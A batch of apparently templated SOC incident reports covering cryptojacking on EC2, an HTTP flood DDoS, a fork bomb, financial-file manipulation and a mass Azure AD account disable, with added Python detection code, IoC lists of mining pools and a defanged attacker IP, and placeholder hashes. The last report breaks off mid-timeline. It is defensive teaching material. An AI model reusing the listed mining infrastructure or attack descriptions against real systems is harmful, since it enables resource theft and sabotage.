Jira Incident Report
Ticket: SOC-2024-167
Summary: T1496 – Cryptocurrency Mining on Compromised EC2 Instance
Status: RESOLVED
Resolution: MALICIOUS – Instance Terminated
Priority: P2 – MEDIUM
Labels: T1496, resource-hijacking, cryptojacking, xmrig, guardduty, aws
Components: Cloud-Security, Resource-Monitoring
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty.
Alert: “Unauthorized Cryptocurrency Mining Activity Detected”.
Instance: i-0a1b2c3d4e5f67890 (Development EC2, c5.4xlarge).
Activity: XMRig miner running, connected to mining pools.
Time: 2024-03-04 14:15 EST.
Technique: MITRE ATT&CK T1496 – Resource Hijacking.
2. Technical Analysis:
Attack Chain:
12:00 – Developer SSH key compromised (personal laptop breach)
12:30 – Attacker logs into EC2 instance using stolen key
12:45 – Attacker downloads xmrig miner from 185.143.221[.]89
13:00 – Miner starts, connects to mining pools
13:00-14:15 – Mining continues (98% CPU)
14:15 – GuardDuty detects
Mining Details:
Software: XMRig (Monero miner)
Pool: mining-pool.com:3333
Hash Rate: Approximately 15 KH/s
Earnings: ~$50/day to the attacker’s wallet
Duration: 2 hours before detection
Compromised Key:
Key Name: dev_key (used by developer)
Leak Source: Developer’s personal laptop infected with stealer
Status: Revoked
Instance Impact:
CPU at 98% for 2 hours
Estimated cost: $5 in extra compute (negligible)
No data exfiltration
3. Investigation Findings:
Timeline:
12:00 – Key compromised
12:30 – Attacker logs in
12:45 – Miner downloaded
13:00-14:15 – Mining
14:15 – GuardDuty alert
14:17 – SOC investigates
14:18 – Instance terminated
Indicators of Compromise (IoCs):
Network:
– mining-pool.com:3333
– xmr-usa.dwarfpool.com:8005
– pool.supportxmr.com:5555
– Download URL: 185.143.221[.]89/config.json
Files:
– /tmp/xmrig (SHA256: a1b2c3d4…)
– /tmp/config.json
SSH Key:
– devops_temp_key (unauthorized)
4. Containment Actions:
Immediate Actions:
Terminated compromised EC2 instance.
Revoked all SSH keys associated with the instance.
Blocked mining pool domains at network level.
Rotated developer’s SSH key.
Cloud Remediation:
Launched new instance from clean AMI.
Restored necessary data from backups.
Implemented stricter SSH key management.
Monitoring Enhancement:
Created CloudWatch alarm for sustained high CPU (>80% for 1 hour).
5. Root Cause Analysis:
Primary Cause: Developer SSH key compromised from personal laptop.
Contributing Factors:
SSH key not rotated regularly.
No MFA for SSH access.
No monitoring for crypto mining.
6. Business Impact:
Operational Impact: Development instance offline for 1 hour.
Financial Impact: ~$5 in extra compute costs.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Instance terminated.
Keys rotated.
Mining blocked.
Technical Controls Enhanced:
Enforced MFA for SSH access (where possible).
Implemented key rotation policy.
Deployed GuardDuty with automated response.
Created CloudWatch alarms for CPU anomalies.
8. Conclusion:
An attacker used a compromised developer SSH key to install a Monero miner on an EC2 instance, hijacking compute resources for cryptocurrency mining. GuardDuty detected the mining behavior and enabled termination of the instance within minutes.
Closure Rationale: Instance terminated; keys rotated; mining stopped.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-04 15:30 EST
128. T1498 – Network Denial of Service (Cloudflare Detection)
Cloudflare Alert Details
Alert ID: CLOUDFLARE-DDOS-1498-7842
Alert Time: 2024-03-04 11:30:22 EST
Severity: HIGH (85/100)
Source: Cloudflare DDoS Protection
Rule: “Layer 7 DDoS Attack Detected – HTTP Flood”
MITRE ATT&CK: T1498.001 – Network Denial of Service: Direct Network Flood
Alert Details:
Detection: HTTP flood DDoS attack against company website
Target: www.company.com
Time: 11:15-11:30 EST
Attack Type: HTTP GET flood
Peak Rate: 125,000 requests per second
Total Requests: 112 million in 15 minutes
Attack Characteristics:
Source IPs: 47,892 unique IPs (botnet)
Geographic distribution: Worldwide
User-Agent: Random (mimicking browsers)
Request pattern: GET /index.php?page=random
HTTP headers: Vary, some with unusual values
Cloudflare Mitigation:
Action: BLOCKED (automatically)
Rule: “HTTP DDoS Attack Protection”
Mitigation Time: 11:16 EST (1 minute after attack start)
Requests Blocked: 100% of attack traffic
Detection Logic:
Traffic volume 100x normal baseline
Request rate anomaly detected
Pattern matches botnet HTTP flood
Cloudflare mitigated automatically
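"Traffic volume 100x normal baseline" is a decision against a baseline, and how that baseline is computed decides whether a flash crowd or a one-second blip trips the rule. The detector below is an added example of that decision over per-second edge counters, not Cloudflare's mitigation logic; the traffic series, the 100x factor and the three-second hold are constructed or assumed.

```python
"""Request-rate anomaly detection over constructed per-second edge counters.

Added example, not Cloudflare's mitigation logic. The traffic series, baseline
factor and hold time are assumptions.
"""
from statistics import median


def build_series():
    """(second, requests, unique_ips): 60 s of normal traffic, then a 15 s flood ramp."""
    series = []
    for s in range(60):                       # ~250 rps from ~40 visitors, with a little jitter
        series.append((s, 240 + (s * 7) % 21, 40 + s % 5))
    ramp = [2_000, 9_000, 30_000, 70_000, 110_000, 125_000, 125_000, 124_000,
            125_000, 123_000, 125_000, 122_000, 125_000, 124_000, 125_000]
    for i, rps in enumerate(ramp):
        series.append((60 + i, rps, min(47_892, rps // 3)))
    return series


def detect_flood(series, warmup=60, factor=100, hold=3):
    """Alert when requests exceed factor * baseline for `hold` consecutive seconds.

    The baseline is the median of the warm-up window, which a short spike cannot
    drag upward the way a mean can. Returns None, or a dict describing the onset.
    """
    baseline = median(r for _, r, _ in series[:warmup])
    limit = factor * baseline
    streak = 0
    for second, rps, _ in series[warmup:]:
        streak = streak + 1 if rps > limit else 0
        if streak == hold:
            onset = second - hold + 1
            attack = [x for x in series if x[0] >= onset]
            peak = max(r for _, r, _ in attack)
            return {"baseline_rps": baseline, "limit_rps": limit,
                    "onset_second": onset, "triggered_second": second,
                    "peak_rps": peak, "peak_unique_ips": max(i for _, _, i in attack),
                    "amplification": round(peak / baseline)}
    return None


if __name__ == "__main__":
    print(detect_flood(build_series()))
```

The hold of three seconds is what costs the detection its latency and buys it precision; the report's one-minute figure reflects the same trade-off at a larger scale. The unique-IP count is the second thing to log, because a rate limit keyed on source address does nothing against 47,892 sources sending a few requests each.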
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Cloudflare alert | Cloudflare Dashboard | Confirmed DDoS attack, automatically mitigated |
| 2. Impact Assessment | Check website availability | Monitoring Tools | Website remained available (Cloudflare mitigation) |
| 3. Attack Analysis | Review attack characteristics | Cloudflare Logs | Botnet HTTP flood, 125K RPS peak |
| 4. Customer Communication | Notify internal stakeholders | Email, Teams | Informed of attack and mitigation |
| 5. Post-Attack Tuning | Adjust WAF rules | Cloudflare | Enhanced rate limiting rules |
| 6. Threat Intelligence | Report to FS-ISAC | Threat Intel Team | Shared attack indicators |
Jira Incident Report
Ticket: SOC-2024-168
Summary: T1498 – Layer 7 DDoS Attack (125K RPS) Mitigated by Cloudflare
Status: RESOLVED
Resolution: MALICIOUS – Attack Mitigated, No Downtime
Priority: P2 – MEDIUM
Labels: T1498, ddos, network-denial-of-service, cloudflare, http-flood
Components: Network-Security, DDoS-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cloudflare DDoS Protection.
Alert: “Layer 7 DDoS Attack Detected – HTTP Flood”.
Target: www.company.com.
Attack Rate: 125,000 requests per second.
Total Requests: 112 million in 15 minutes.
Time: 2024-03-04 11:30 EST.
Technique: MITRE ATT&CK T1498.001 – Network Denial of Service: Direct Network Flood.
2. Technical Analysis:
Attack Characteristics:
Type: HTTP GET flood (Layer 7)
Source IPs: 47,892 unique IPs (botnet)
Countries: Top sources: China (18%), Brazil (12%), India (10%), US (8%)
User-Agent: Randomized (spoofing Chrome, Firefox, Safari)
Request Pattern: GET /index.php?page=[random] (random parameter)
Peak Rate: 125,000 RPS (500x normal)
Cloudflare Mitigation:
Detection Time: 11:16 EST (1 minute after attack start)
Mitigation Action: Challenge page, rate limiting
Requests Blocked: 100% of attack traffic
Legitimate Traffic: Allowed (0 impact)
Impact Assessment:
Website remained available throughout
No performance degradation
No data breach
3. Investigation Findings:
Timeline:
11:15 – Attack begins
11:16 – Cloudflare detects and mitigates
11:30 – Alert sent to SOC
11:32 – SOC investigates
11:35 – Stakeholders notified
Indicators of Compromise (IoCs):
Attack Pattern:
– HTTP GET flood
– Random page parameter
– Distributed botnet (47K+ IPs)
No permanent IoCs (attack only)
4. Containment Actions:
Immediate Actions:
Verified Cloudflare mitigation was effective.
Monitored for second wave (none).
Notified internal teams.
Post-Attack:
Analyzed attack patterns for future tuning.
Enhanced rate limiting rules.
Updated WAF to block similar patterns.
5. Root Cause Analysis:
Primary Cause: External attacker using botnet to overwhelm web servers.
Contributing Factors:
Public-facing website (always a target).
Without DDoS protection in front of the site, the attack would have caused an outage.
6. Business Impact:
Operational Impact: None (Cloudflare mitigated).
Financial Impact: None.
Reputational Impact: None (no downtime).
7. Remediation & Prevention:
Completed Actions:
Attack mitigated automatically.
Post-attack analysis completed.
Technical Controls Enhanced:
Verified Cloudflare DDoS protection settings.
Enhanced rate limiting.
Updated WAF rules.
8. Conclusion:
A large-scale HTTP flood DDoS attack targeted the company website, peaking at 125,000 requests per second. Cloudflare’s DDoS protection automatically detected and mitigated the attack within one minute, resulting in zero downtime.
Closure Rationale: Attack mitigated; no impact; controls verified.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-04 12:30 EST
129. T1499 – Endpoint Denial of Service (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-ENDPOINT-DOS-1499-7842
Alert Time: 2024-03-04 16:30:45 EST
Severity: HIGH (82/100)
Source: Microsoft Defender for Endpoint
Rule: “Fork Bomb Detected – Potential DoS”
MITRE ATT&CK: T1499.001 – Endpoint Denial of Service: OS Exhaustion Flood
Alert Details:
Detection: Process creating excessive number of child processes (fork bomb)
Host: DEV-WS-078 (Development Workstation)
User: alexchen@company.com (Alex Chen, Engineer)
Time: 16:15-16:30 EST
Process Tree:
cmd.exe (PID: 2341)
cmd.exe (PID: 4789)
cmd.exe (PID: 4792)
cmd.exe (PID: 4795)
(thousands of processes)
Process Count:
16:15:00 – 50 processes
16:20:00 – 2,500 processes
16:25:00 – 8,000 processes
16:30:00 – System unresponsive (alert triggered)
Detection Logic:
Exponential process creation (fork bomb)
System resource exhaustion (CPU 100%, memory full)
User alexchen has no legitimate reason for this
Pattern matches denial of service attack
Additional Context:
Host became unresponsive at 16:28
User locked out
Hard reboot required
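The process counts above show the shape of the problem: the total grows geometrically, and every new process descends from one root. Counting processes per host misses that structure and would also fire on a large parallel build; attributing each creation to the root of its tree and counting per root does not. The detector below is an added example of that approach, not Defender's logic; the doubling tree, the benign build and the 500-process threshold are constructed or assumed.

```python
"""Detect runaway process trees from constructed process-creation events.

Added example, not Defender's logic. Events are (timestamp, pid, ppid, image);
the doubling tree, the benign build and the thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_events():
    events = []
    t0 = datetime(2024, 3, 4, 16, 5, 0)
    # Runaway tree: one cmd.exe whose every descendant spawns two more, 20 s per generation
    events.append((t0, 2341, 1000, "cmd.exe"))            # 1000 = explorer, not in the event set
    frontier, next_pid = [(2341, t0)], 4789
    for _ in range(10):                                    # 10 generations -> 2047 processes
        new = []
        for ppid, t in frontier:
            for _ in range(2):
                child_t = t + timedelta(seconds=20)
                events.append((child_t, next_pid, ppid, "cmd.exe"))
                new.append((next_pid, child_t))
                next_pid += 1
        frontier = new
    # Benign: a build that fans out to 40 compiler processes under one msbuild
    events.append((t0, 7000, 1000, "msbuild.exe"))
    for i in range(40):
        events.append((t0 + timedelta(seconds=i + 1), 7100 + i, 7000, "cl.exe"))
    return events


def find_runaway_trees(events, threshold=500, window=timedelta(minutes=5)):
    """Attribute each creation to the root of its tree (a parent not created in the data),
    then flag roots whose tree gained >= threshold processes inside any `window`."""
    events = sorted(events, key=lambda e: e[0])
    root_of = {}
    image_of = {}
    per_root = defaultdict(list)
    for ts, pid, ppid, image in events:
        root = root_of.get(ppid, pid)      # unknown parent => this process starts a tree
        root_of[pid] = root
        image_of.setdefault(root, image)
        per_root[root].append(ts)

    flagged = {}
    for root, stamps in per_root.items():
        peak, start = 0, 0                 # sliding window over the tree's creation times
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[root] = {"image": image_of[root], "tree_size": len(stamps),
                             "peak_in_window": peak,
                             "span_seconds": (stamps[-1] - stamps[0]).total_seconds()}
    return flagged


if __name__ == "__main__":
    for root, info in find_runaway_trees(build_sample_events()).items():
        print(root, info)
```

With the default threshold only the cmd.exe tree is reported and the build is not; lowering it to 30 flags the build too, which is the knob an engineering fleet would tune. A job object or process-count limit applied at logon is the preventive control that makes the alert moot; detection alone arrives, as here, after the host has already stopped responding.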
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed fork bomb activity |
| 2. Remote Access | Attempt remote access (failed) | RDP, PowerShell | Host unresponsive |
| 3. Physical Access | Dispatch to user location | Security Team | Hard reboot performed |
| 4. Post-Recovery Analysis | Check logs after reboot | CrowdStrike Falcon | Malicious script launched fork bomb |
| 5. User Interview | Contact alexchen | Teams, Phone | User ran “stress test” tool from internet |
| 6. Tool Removal | Delete malicious script | CrowdStrike Live Response | Script removed |
Jira Incident Report
Ticket: SOC-2024-169
Summary: T1499 – Fork Bomb DoS on Development Workstation
Status: RESOLVED
Resolution: MALICIOUS – System Recovered
Priority: P3 – LOW
Labels: T1499, endpoint-dos, fork-bomb, defender, user-error
Components: Endpoint-Security, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Fork Bomb Detected – Potential DoS”.
Host: DEV-WS-078 (Development, user alexchen).
Activity: Exponential process creation (fork bomb).
Outcome: System unresponsive.
Time: 2024-03-04 16:30 EST.
Technique: MITRE ATT&CK T1499.001 – Endpoint Denial of Service: OS Exhaustion Flood.
2. Technical Analysis:
Attack Chain:
16:00 – User downloads “stress test tool” from the internet
16:05 – User executes forkbomb.exe
16:05-16:28 – Exponential process creation
16:28 – System becomes unresponsive
16:30 – Defender alerts (after reboot)
Fork Bomb Code:
Simple batch file or executable that recursively creates processes
Consumes all system resources (CPU, memory)
Renders system unusable until reboot
User Intent:
User was “curious about system limits”
No malicious intent
Unaware of consequences
Post-Recovery:
System hard rebooted by security team
No persistence or data loss
3. Investigation Findings:
Timeline:
16:00 – Tool downloaded
16:05 – Execution
16:28 – System unresponsive
16:30 – Physical reboot
16:32 – SOC investigates
16:35 – Tool identified and removed
Indicators of Compromise (IoCs):
Files:
– C:\Users\alexchen\Downloads\forkbomb.exe (SHA256: a1b2c3d4…)
Process:
– Exponential process creation
4. Containment Actions:
Immediate Actions:
Hard reboot of affected host.
Deleted forkbomb.exe.
Scanned for other malware (none).
User Remediation:
User counseled on safe software practices.
Required to complete security awareness training.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed untrusted “stress test” tool.
Contributing Factors:
No application control blocking unknown executables.
User unaware of fork bomb risks.
6. Business Impact:
Operational Impact: Developer workstation offline for 1 hour.
Data Exposure: None.
Productivity Impact: Minor.
7. Remediation & Prevention:
Completed Actions:
Malicious tool removed.
User educated.
System restored.
Technical Controls Enhanced:
Created alert for excessive process creation.
Enhanced application control policies.
8. Conclusion:
A developer downloaded and executed a fork bomb tool, causing his workstation to become unresponsive. Defender detected the anomalous process creation after reboot. The tool was removed, and the user was educated.
Closure Rationale: System recovered; tool removed; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-04 17:30 EST
130. T1565 – Data Manipulation (Varonis Detection)
Varonis Alert Details
Alert ID: VARONIS-DATA-MANIP-1565-7842
Alert Time: 2024-03-04 10:30:22 EST
Severity: CRITICAL (95/100)
Source: Varonis Data Security Platform
Rule: “Mass File Modification – Potential Data Manipulation”
MITRE ATT&CK: T1565.001 – Data Manipulation: Stored Data Manipulation
Alert Details:
Detection: Large number of files modified with data changes (not metadata)
User: kwilson@company.com (Karen Wilson, Finance Manager)
Host: FIN-WS-112
Time: 10:15-10:30 EST
File Modification Events:
10:15-10:30: 847 files modified
File types: .xlsx, .csv, .txt, .pdf
Locations:
\\filesrv\finance\reports\ – 345 files
\\filesrv\finance\budgets\ – 234 files
\\filesrv\finance\forecasts\ – 156 files
\\filesrv\shared\finance\ – 112 files
Data Change Analysis:
Financial numbers altered (random values inserted)
Decimal points moved (e.g., 1,234.56 → 12,345.6)
Some files completely overwritten with garbage
PDF documents corrupted (cannot open)
Sample Change (from Varonis content analysis):
Original: “Q1 Revenue: $1,234,567”
Modified: “Q1 Revenue: $9,876,543”
Detection Logic:
847 files modified in 15 minutes (highly anomalous)
Changes are to data content (not metadata)
Financial data targeted (critical)
User kwilson has no legitimate reason for mass changes
Pattern matches data manipulation/sabotage
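The alert's key distinction, changes to data content rather than to metadata, is what a file integrity monitor has to make before it can count "847 files modified" as manipulation. The Python below is an added example (not Varonis code, and not the report's own tooling): it builds a SHA-256 baseline of a share, then classifies every file as content-modified, metadata-only, missing or added, and summarises content changes per top-level folder the way the alert's Locations list does. The share, its files and the tampering are constructed in a temporary directory; file names and contents are invented.

```python
"""File integrity monitoring for a finance share (added example).

The share layout and contents are constructed in a temporary directory; the
functions are not Varonis code. The point is to separate content changes
(hash differs) from metadata-only changes (timestamp differs, hash identical).
"""
import hashlib
import os
import tempfile
from collections import Counter
from pathlib import Path


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map each file (relative, POSIX-style path) to its hash, size and mtime."""
    root = Path(root)
    baseline = {}
    for p in root.rglob("*"):
        if p.is_file():
            st = p.stat()
            baseline[p.relative_to(root).as_posix()] = (_sha256(p), st.st_size, st.st_mtime_ns)
    return baseline


def compare(root, baseline):
    """Classify every file as content_modified, metadata_only, missing or added."""
    current = build_baseline(root)
    result = {"content_modified": [], "metadata_only": [], "missing": [], "added": []}
    for rel, (old_hash, _, old_mtime) in baseline.items():
        if rel not in current:
            result["missing"].append(rel)
            continue
        new_hash, _, new_mtime = current[rel]
        if new_hash != old_hash:
            result["content_modified"].append(rel)   # data changed, regardless of timestamps
        elif new_mtime != old_mtime:
            result["metadata_only"].append(rel)      # touched, but bytes identical
    result["added"] = list(set(current) - set(baseline))
    for k in result:
        result[k].sort()
    return result


def by_folder(paths):
    """Count changes per top-level folder, e.g. {'reports': 345, 'budgets': 234}."""
    return dict(Counter(p.split("/", 1)[0] for p in paths))


def demo():
    """Constructed scenario: baseline a small share, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        share = Path(tmp)
        files = {   # constructed sample content
            "reports/q1_results.csv": "Line item,Amount\nQ1 Revenue,1234567\n",
            "reports/q2_results.csv": "Line item,Amount\nQ2 Revenue,1456000\n",
            "budgets/it_budget.csv": "Dept,Budget\nIT,850000\n",
            "forecasts/fy25.txt": "FY25 projection: 12% growth\n",
        }
        for rel, text in files.items():
            (share / rel).parent.mkdir(parents=True, exist_ok=True)
            (share / rel).write_text(text)
        baseline = build_baseline(share)

        # Tampering as in the incident: a number altered, a file overwritten with
        # garbage, and one file merely touched (metadata change only).
        (share / "reports/q1_results.csv").write_text("Line item,Amount\nQ1 Revenue,9876543\n")
        (share / "budgets/it_budget.csv").write_bytes(os.urandom(64))
        touched = share / "forecasts/fy25.txt"
        st = touched.stat()
        os.utime(touched, ns=(st.st_atime_ns, st.st_mtime_ns + 10**9))

        diff = compare(share, baseline)
        return diff, by_folder(diff["content_modified"])


if __name__ == "__main__":
    print(demo())
```

The baseline is also what the "Verified data integrity (compared with backups)" step needs: hashing the restored files against a baseline taken from the backup set gives a mechanical check that restoration was complete, rather than relying on the finance team opening files by hand.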
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Varonis alert | Varonis Console | Confirmed mass file manipulation |
| 2. Process Investigation | Identify process modifying files | CrowdStrike Falcon | PowerShell script data_corrupt.ps1 |
| 3. User Interview | Contact kwilson | Teams, Phone | User did NOT run script (account compromised) |
| 4. Immediate Action | Isolate host | CrowdStrike | FIN-WS-112 quarantined |
| 5. Data Restoration | Restore modified files from backup | Veeam Backup | All 847 files restored |
| 6. Account Remediation | Disable kwilson account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-170
Summary: T1565 – Data Manipulation of 847 Financial Files
Status: RESOLVED
Resolution: MALICIOUS – Files Corrupted, Restored from Backups
Priority: P1 – CRITICAL
Labels: T1565, data-manipulation, financial-data, varonis, compromised-account
Components: Data-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Mass File Modification – Potential Data Manipulation”.
User: kwilson@company.com (Finance Manager).
Files: 847 financial files modified/corrupted.
Time: 2024-03-04 10:30 EST.
Technique: MITRE ATT&CK T1565.001 – Data Manipulation: Stored Data Manipulation.
2. Technical Analysis:
Attack Chain:
09:30 – kwilson account compromised via phishing
09:45 – Attacker logs into FIN-WS-112 via RDP
09:50 – Attacker downloads data_corrupt.ps1 script
10:00 – Attacker runs script against finance shares
10:15-10:30 – 847 files modified
10:30 – Varonis detects
Script Analysis:
Name: data_corrupt.ps1
SHA256: a1b2c3d4e5f6…
Function: Reads Excel/CSV files, randomly alters numbers, corrupts PDFs
Targets: Financial data (reports, budgets, forecasts)
Files Affected (847):
Financial reports (345) – Q1-Q4 results altered
Budget spreadsheets (234) – department budgets corrupted
Forecast models (156) – projections invalid
Shared finance docs (112) – various
Total data corrupted: ~450 MB
Impact:
Financial reports now contain incorrect numbers
Some files completely unusable
Trust in data integrity compromised
Attacker Intent:
Sabotage financial reporting
Cause business disruption
Undermine confidence in data
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
09:50-10:00 – Script downloaded
10:15-10:30 – File manipulation
10:30 – Varonis alert
10:32 – SOC investigates
10:33 – Host isolated
10:35 – Backup restoration begins
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\Downloads\data_corrupt.ps1 (SHA256: a1b2c3d4…)
Commands:
– PowerShell script manipulating financial files
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-112 via CrowdStrike.
Disabled kwilson account.
Reset password.
Deleted data_corrupt.ps1.
Data Recovery:
Restored all 847 corrupted files from Veeam backups.
Verified data integrity (compared with backups).
Finance team validated restored files.
Prevention:
No further manipulation occurred.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data manipulation.
Contributing Factors:
No MFA on account.
RDP allowed from the internet.
Finance data accessible to user (legitimate, but abused).
6. Business Impact:
Operational Impact: Finance team unable to use files for 2 hours.
Data Exposure: Data corrupted, not exfiltrated.
Financial Impact: Potential reporting delays; restored from backups.
7. Remediation & Prevention:
Completed Actions:
Data restored.
Account secured.
Malicious script removed.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented file integrity monitoring for critical data.
Enhanced Varonis alerting for mass modifications.
8. Conclusion:
An attacker compromised a finance manager’s account and ran a script that manipulated 847 financial files, corrupting critical data. Varonis detected the mass modifications, enabling rapid restoration from backups. No permanent data loss occurred.
Closure Rationale: Data corrupted; data restored from backups; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-04 11:30 EST
Batch 27: Impact & Defense Evasion Incident Reports
131. T1531 – Account Access Removal (Azure AD Detection)
Azure AD Alert Details
Alert ID: AAD-ACCOUNT-REMOVAL-1531-7842
Alert Time: 2024-03-05 09:30:15 EST
Severity: CRITICAL (98/100)
Source: Azure AD Identity Protection + Audit Logs
Rule: “Mass Account Disable/Deletion Detected”
MITRE ATT&CK: T1531 – Account Access Removal
Alert Details:
Detection: Bulk disabling/deletion of user accounts in Azure AD
Time: 09:15-09:30 EST
Action Performed By: jwilson@company.com (Global Administrator)
Source IP: 185.143.221[.]89 (Bulgaria)
Audit Events:
09:15:22 – Disable user: bturner@company.com (Finance)
09:15:45 – Disable user: kwilson@company.com (Finance Manager)
09:16:12 – Disable user: alexchen@company.com (Engineering)
09:16:38 – Disable user: rpatel@company.com (Engineering)
09:17:05 – Disable user: sjones@company.com (Marketing)
09:17:33 – Disable user: mwilson@company.com (Sales)
09:18:01 – Disable user: cjohnson@company.com (CEO)
09:18:28 – Disable user: jsmith@company.com (IT Admin)
… (continuing)
Total Accounts Affected: 47 users disabled
12 from Finance
8 from Engineering
6 from Marketing
5 from Sales
4 from HR
12 others (including executives and admins)
Additional Actions:
09:20:15 – Conditional Access policies modified to block all users
09:22:30 – MFA settings reset for 10 users
09:25:45 – Guest users removed (12 accounts)
Detection Logic:
47 accounts disabled in 15 minutes (highly anomalous)
Actions from unusual location (Bulgaria)
Performed by Global Admin jwilson (who was on leave)
Pattern matches account access removal (sabotage/ransomware prep)
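The "47 accounts disabled in 15 minutes" rule is a sliding-window count per initiator over the audit log, and the same pass can produce the list of accounts that step 4 of the investigation has to re-enable. The Python below is an added example, not Azure AD Identity Protection logic and not the report's own script: the records are constructed to resemble simplified Azure AD audit entries (the field names `activity`, `initiator`, `target`, `ip` and the threshold of 10 are assumptions), the first eight disabled users come from the audit events above, and the remaining four plus the HR offboarding account are invented so that a routine two-account offboarding is shown not to trigger the alert.

```python
"""Mass account-disable detection over Azure AD audit records (added example).

Records are constructed to resemble Azure AD audit-log entries; the field
names are simplified and the threshold is an assumption, not an Identity
Protection rule.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

DISABLE = "Disable account"
CA_UPDATE = "Update conditional access policy"


def _t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def find_mass_disable(records, threshold=10, window=timedelta(minutes=15)):
    """One alert per initiator who disables >= `threshold` distinct accounts within `window`.

    A sliding window runs over the initiator's sorted disable events; once the
    threshold is crossed, later events within `window` of the previous one are
    folded into the same burst so the alert carries the full restore list.
    """
    by_actor = defaultdict(list)
    for r in records:
        if r["activity"] == DISABLE:
            by_actor[r["initiator"]].append(r)
    alerts = []
    for actor, recs in by_actor.items():
        recs.sort(key=lambda r: _t(r["time"]))
        win, burst, last = deque(), set(), None
        for r in recs:
            now = _t(r["time"])
            win.append(r)
            while _t(win[0]["time"]) < now - window:
                win.popleft()
            if burst and now - last <= window:
                burst.add(r["target"])
            elif len({x["target"] for x in win}) >= threshold:
                burst.update(x["target"] for x in win)
            if burst:
                last = now
        if burst:
            ca_changes = [r for r in records if r["activity"] == CA_UPDATE and r["initiator"] == actor]
            alerts.append({
                "initiator": actor,
                "source_ips": sorted({r["ip"] for r in recs}),
                "reenable": sorted(burst),            # restore list for the responder
                "ca_policy_changes": len(ca_changes),  # policy tampering by the same actor
            })
    return alerts


def sample_records():
    """Constructed audit trail: the burst from the alert above plus benign HR offboarding."""
    actor, ip = "jwilson@company.com", "185.143.221[.]89"
    burst = [
        ("09:15:22", "bturner"), ("09:15:45", "kwilson"), ("09:16:12", "alexchen"),
        ("09:16:38", "rpatel"), ("09:17:05", "sjones"), ("09:17:33", "mwilson"),
        ("09:18:01", "cjohnson"), ("09:18:28", "jsmith"),
        # the four below are invented to stand in for the "(continuing)" entries
        ("09:18:55", "dlee"), ("09:19:20", "mgarcia"), ("09:19:48", "tnguyen"), ("09:20:10", "pbrown"),
    ]
    recs = [{"time": f"2024-03-05 {hms}", "activity": DISABLE, "initiator": actor,
             "target": f"{u}@company.com", "ip": ip} for hms, u in burst]
    recs.append({"time": "2024-03-05 09:20:15", "activity": CA_UPDATE, "initiator": actor,
                 "target": "Require MFA for external access", "ip": ip})
    # Routine offboarding: two disables hours apart, from an internal address (constructed).
    for hms, u in (("08:02:10", "former.employee1"), ("13:40:00", "former.employee2")):
        recs.append({"time": f"2024-03-05 {hms}", "activity": DISABLE,
                     "initiator": "hr-offboarding@company.com",
                     "target": f"{u}@company.com", "ip": "10.20.0.15"})
    return recs


if __name__ == "__main__":
    for a in find_mass_disable(sample_records()):
        print(a["initiator"], len(a["reenable"]), "accounts;", a["ca_policy_changes"], "CA change(s)")
```

The threshold should be set below any legitimate bulk operation the identity team performs (offboarding waves, migrations) or those operations should be whitelisted by initiator; without that, the alert "No alerts for mass account changes" noted in the root cause becomes an alert nobody trusts.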
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Azure AD audit logs | Azure AD Portal | Confirmed mass account disable events |
| 2. User Verification | Contact jwilson | Phone, Teams | jwilson on leave; did NOT perform actions |
| 3. Immediate Action | Disable compromised jwilson account | Azure AD, AD | jwilson account disabled |
| 4. Account Restoration | Re-enable all 47 disabled accounts | Azure AD PowerShell | All accounts re-enabled |
| 5. Conditional Access Fix | Revert policy changes | Azure AD | Conditional Access policies restored |
| 6. Incident Response | Activate breach response | Legal, Management | Data breach declared |
Jira Incident Report
Ticket: SOC-2024-171
Summary: T1531 – Mass Account Disable (47 Users) by Compromised Global Admin
Status: RESOLVED
Resolution: MALICIOUS – Accounts Restored
Priority: P1 – CRITICAL
Labels: T1531, account-access-removal, azure-ad, compromised-admin
Components: Identity-Management, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection + Audit Logs.
Alert: “Mass Account Disable/Deletion Detected”.
Action: 47 user accounts disabled, Conditional Access policies modified.
Performed By: jwilson@company.com (Global Administrator) – compromised.
Source IP: 185.143.221[.]89 (Bulgaria).
Time: 2024-03-05 09:30 EST.
Technique: MITRE ATT&CK T1531 – Account Access Removal.
2. Technical Analysis:
Attack Chain:
08:30 – jwilson credentials compromised via phishing
08:45 – Attacker logs into Azure AD portal from Bulgaria IP
09:00 – Attacker enumerates users, identifies targets
